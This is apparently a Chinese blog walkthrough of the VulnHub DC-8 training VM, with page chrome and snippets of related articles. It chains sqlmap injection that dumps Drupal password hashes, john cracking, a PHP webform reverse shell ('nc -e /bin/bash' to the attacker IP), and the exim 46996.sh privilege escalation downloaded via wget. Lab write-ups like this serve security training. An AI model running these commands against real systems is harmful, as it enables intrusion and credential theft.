vulnhub-dc8

已于 2022-09-30 14:16:18 修改
阅读量186 收藏 1
点赞数
分类专栏: 内网 vulhub 文章标签: web安全 linux
于 2022-09-30 14:10:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_55654781/article/details/127122648
版权

靶机地址

https://www.vulnhub.com/?q=dc-

打开靶机,设置为同一种nat模式

kali 信息收集主机发现 ,并扫描该主机ip

arp-scan -l
nmap -p- -sV 192.168.1.206

在这里插入图片描述

访问页面,扫描该网站目录,没有发现有用界面

dirb http://192.168.1.206 |grep -v 403

在这里插入图片描述

访问网页,发现nid在变化,尝试手工注入发现报错

在这里插入图片描述

通过sqlmap注入,查询到数据库为d7db information_schema

python sqlmap.py -u "http://192.168.1.206/?nid=3"  --dbs --batch 查询数据库

在这里插入图片描述

查询表:
python sqlmap.py -u "http://192.168.1.206/?nid=3" --batch -D d7db --tables
查询列
python sqlmap.py -u "http://192.168.1.206/?nid=3"  -D d7db -T users --columns
查询用户密码
python sqlmap.py -u "http://192.168.1.206/?nid=3"  -D d7db -T users -C "uid,name,pass" --dump

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

admin   $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z 
john    $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

将hash值放入2.txt,利用工具john爆破密码为turtle

john --wordlist=/usr/share/john/password.lst --rules 2.txt

在这里插入图片描述

ssh无法登录,尝试网页后台登录界面

在这里插入图片描述

远程代码执行

在Find content => WEBFROM => Form settings中可以编写shell,其中p标签中的东西不要删除

<?php
system("nc -e /bin/bash 192.168.1.162 1234");
?>

在这里插入图片描述

开启监听后,提交页面,接收反弹后开启交互模式

python -c 'import pty;pty.spawn("/bin/bash")'

在这里插入图片描述

find 命令查找具有sudo 权限的命令,发现exim4,查询版本

find / -perm -u=s -type f 2>/dev/null
exim4 --version

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rIpDrtmb-1664518032030)(../../../../img/dc8/11.png)]

在这里插入图片描述

serachsploit查找exim命令的漏洞,复制到本地并改名为exp.sh

serachsploit exim
cp /usr/share/exploitdb/exploits/linux/local/46996.sh exp.sh

在这里插入图片描述

查看文件是否为linux可执行文件,如果为dos修改为unix,开启http服务,在交互式下远程下载exp.sh,进入/tmp目录下载

set ff? 
python3 -m http.server 80
wget http://192.168.1.162:8000/exp.sh

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Uv91UzOD-1664518032033)(../../../../img/dc8/14.png)]

给exp.sh执行权限,执行

chmod 777 exp.sh
./exp.sh -m netcat

在这里插入图片描述

进入root目录查看flag

在这里插入图片描述
参考链接
https://blog.youkuaiyun.com/weixin_45744814/article/details/120113301

Vulnhub-DC 7-9 提权、端口敲门
2301_80115097的博客
04-28 1221
Vulnhub是一个提供了很多漏洞环境的靶场平台,其中的环境基本上都是做好的虚拟机镜像文件,需要使用VMware或者是VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚拟机到获取操作系统的root权限和查看flag。靶场部署Vulnhub官网:https://www.vulnhub.com下载地址:https://www.vulnhub.com/entry/dc-8,367/直接从官网下载做好的虚拟机镜像文件(我下载的Mirror版本);
Vulnhub - DC-1
qq_46081990的博客
03-14 489
Nmap扫描目标主机,发现开放22、80、111、40884端口,分别运行OpenSSH 6.0p1、Apache httpd 2.2.22、rpcbind 2-4服务。MSF搜索Drupal,使用payload:exploit/unix/webapp/drupal_drupalgeddon2,成功拿到Web权限www-data。查询GTFOBins得知find的SUID提权方式如下,启用一个新的root权限的bash。上传综合辅助探测脚本LinEnum.sh至目标主机/tmp目录下,给予执行权限执行。
vulnhubdc8
qq_54030686的博客
06-22 528
各位小伙伴,可直接看这位师傅 个人写的很粗糙 DC8本身的难度较低,可以较为轻松地获取到目标权限,总体思路 主机发现,端口扫描,服务探测 一共开启2个端口,80和22端口,80端口开放的服务为drupal 7,打开界面进行检测,这里利用burpsuit联合xray进行检测 burpsuit的user option操作栏中设置自己闲置代理,运行xray即可,如下图所示这里使用bp自带的浏览器进行测试,然后在界面进行点击,每一个功能点都要点击下 点击到 该界面时候,xray检测到存在sql注入,直接上sqlma
vulnhub靶机之DC8
timesleep的博客
03-08 168
kali IP 192.168.208 我们首先扫描靶机IP 靶机IP为192.168.99.223 然后我们对他的端口进行扫描 然后我们看到他只有22和80端口 访问80然后信息收集 发现点击这里的时候会发现网页的变化所以我推断他可能会有sql注入我们收集一下错误信息 然后我们用sqlmap试着跑一下 sqlmap -u "http://192.168.99.223/?nid=2" --dbs --level 3 最好跑出来的结果 sqlmap -u "http://192.168.9
看完这篇 教你玩转渗透测试靶机vulnhub——DC8
Aluxian_的博客
04-07 2525
Vulnhub靶机DC8渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集:②:暴力破解: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC8 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.c
Vulnhub系列】Vulnhub_DC-8靶场渗透(原创)
Lusen的博客
07-26 991
Vulnhub系列-DC-8靶场做题记录
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机渗透-Vulnhub-DC-2
dahege666的博客
01-21 411
下载地址: 1、链接:https://pan.baidu.com/s/1cl5-9SrevaFehfS4lY4w5w 提取码:7ahw 2、http://www.five86.com/downloads/DC-2.zip 3、https://download.vulnhub.com/dc/DC-2.zip 靶机:DC2(VMware桥接) IP:192.168.88.123 攻击机:Kali(VMware桥接) IP:192.168..88.109 测试之前需要修改一下hos...
vulnhub-DC系列通关记DC1靶机渗透
qq_35258210的博客
02-07 1800
目录 flag1 信息收集 漏洞利用 后渗透 flag2 flag3 flag4 最终flag 该流程图出于:https://blog.youkuaiyun.com/weixin_44288604/article/details/108027062 本次学习参考于b站千峰机构的网络安全视频:https://www.bilibili.com/video/BV1i7411G7vm?p=268 这张流程图做得很好借来用用。如有侵权请告知删除 flag1 首先我们在启动DC1靶机后进入到系统只显示
DC-8 靶机
日常打一些漏洞靶机
07-29 488
根据对比可知DC-8的一个ip地址为192.168.47.133。经过测试发现正确的账户名和密码为john和turtle。选择一个不需要root用户权限的目录,比如tmp。可得出一个叫turtle的密码。ps:如果出现下述情况可输入。出现robots.txt文件。发现存在用户登录的一个界面。选择使用46996.sh。出现root说明提权成功。发现一个比较奇怪的命令。
靶机 Raven2 / UDF 提权
weixin_51559599的博客
10-14 178
动态链接库 udf 提权find 提权suid。
Vulnhub靶机实战——DC-8
冠霖L的博客
10-30 3582
靶机DC-8下载地址:https://download.vulnhub.com/dc/DC-8.zip 环境:VMware 15虚拟机软件 DC-8靶机IP地址:192.168.220.156 Kali的IP地址:192.168.220.155 DC-8靶机与kali都以NAT模式连接到网络,查看kali的IP地址:192.168.220.155 ...
Vulnhub靶场实战---DC-8
一期一会的博客
12-13 4881
0x00 环境搭建 1.官网下载地址:DC: 8 ~ VulnHubDC: 8, made by DCAU. Download & walkthrough links are available.https://www.vulnhub.com/entry/dc-8,367/2.下载完成之后直接导入vm,使用NAT模式连接,保持在同一网段 攻击机:kali (192.168.88.130) 靶机:DC-8 (192.168.88.131) 0x01 信息收集 1.找到目标主机 ,拿ar.
SearchSploit漏洞查找工具使用指南
大方子
10-04 7903
什么是SearchSploit: “searchsploit”是一个用于Exploit-DB的命令行搜索工具,它还允许你随身带一份Exploit-DB的副本。 SearchSploit为您提供了在本地保存的存储库中执行详细的离线搜索的能力。这种能力特别适用于在没有互联网接入的情况下对网络进行安全评估。许多漏洞都包含了二进制文件的链接,这些文件不包含在标准存储库中,但可以在我们的Exploit-...
记一次在实战靶机中使用`SearchSploit`的总结
weixin_34268310的博客
10-07 1067
记一次在实战靶机中使用SearchSploit的总结 本文首发:记一次在实战靶机中使用SearchSploit的总结:https://xz.aliyun.com/t/2857 什么是SearchSploit? GitHub上的漏洞数据库存储库中包含 “searchsploit”,这是一个Exploit-DB的命令行搜索工具,它还允许您随身携带漏洞利用数据...
SearchSploit
子曰小玖的博客
07-23 1330
SearchSploit – The Manual Included in ourExploit Database repository on GitHubissearchsploit, a command line search tool for Exploit-DB that also allows you to take a copy of Exploit Database with...
MySQL_UDF提权实验
多喝i热水的博客
11-13 4298
目录 0.环境下载: 1.扫描存活主机 2.目录猜解 3.反弹SHELL 0.环境下载: https://www.vulnhub.com/entry/raven-2,269/ 1.扫描存活主机 nmap -sn 192.168.217.0/24 2.目录猜解 dirb http://192.168.217.141/ http://192.168.217.141/vender 同时目录下还存在一个PHPMailerAutoload.php的文件,配合起来看应该是使用了5.2.16版本的
vulnhub靶机DC-1
最新发布
02-08
### VulnHub DC-1 靶机 攻略 介绍 #### 下载地址 VulnHub是一个提供各种虚拟机镜像用于安全测试和学习渗透测试技巧的平台。对于DC-1靶机,可以在[VulnHub官网](https://www.vulnhub.com/)搜索并下载该靶机镜像文件。 #### 初始信息收集 在启动DC-1之后,通过网络扫描工具如`nmap`来发现开放端口和服务版本是非常重要的初步操作[^2]。这有助于了解目标系统的潜在弱点所在之处。 ```bash nmap -A <target_ip> ``` #### Web应用漏洞探测 一旦确认存在Web服务运行于特定IP地址之上,则可以采用专门针对WordPress站点的安全评估工具WPScan来进行进一步的信息挖掘工作: ```bash wpscan --url http://<target_ip>/wordpress/ ``` 此命令能够帮助识别可能存在的插件或主题中的已知漏洞,并尝试获取管理员用户名列表等有用情报[^1]。 #### 获取初始访问权限 当已经掌握了某些关于网站后台管理账号线索后(比如默认用户名),可借助Hydra这样的暴力破解程序配合常用密码字典对登录界面发起攻击以期获得合法凭证进入内部环境: ```bash hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/passwords.txt ssh://<target_ip> ``` 这里假设SSH服务对外开放并且允许远程登陆;实际过程中还需根据具体情况调整相应参数设置[^3]。 #### 提升权限至root级别 成功创建Meterpreter会话意味着获得了较为深入的目标主机控制权,在此基础上继续探索其他未授权区域直至找到可用于提升当前用户权限的方法。例如,如果遇到弱配置下的Sudoers文件或是设置了简单密码的辅助账户,都可以成为突破口之一[^5]: ```bash sudo -l # 查看是否有无需密码即可执行高权限指令的情况 whoami # 确认当前身份 su admin # 尝试切换到更高权限用户 ``` 以上就是有关如何攻克VulnHub平台上名为DC-1这一挑战性实验项目的概览描述以及部分关键技术要点提示。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值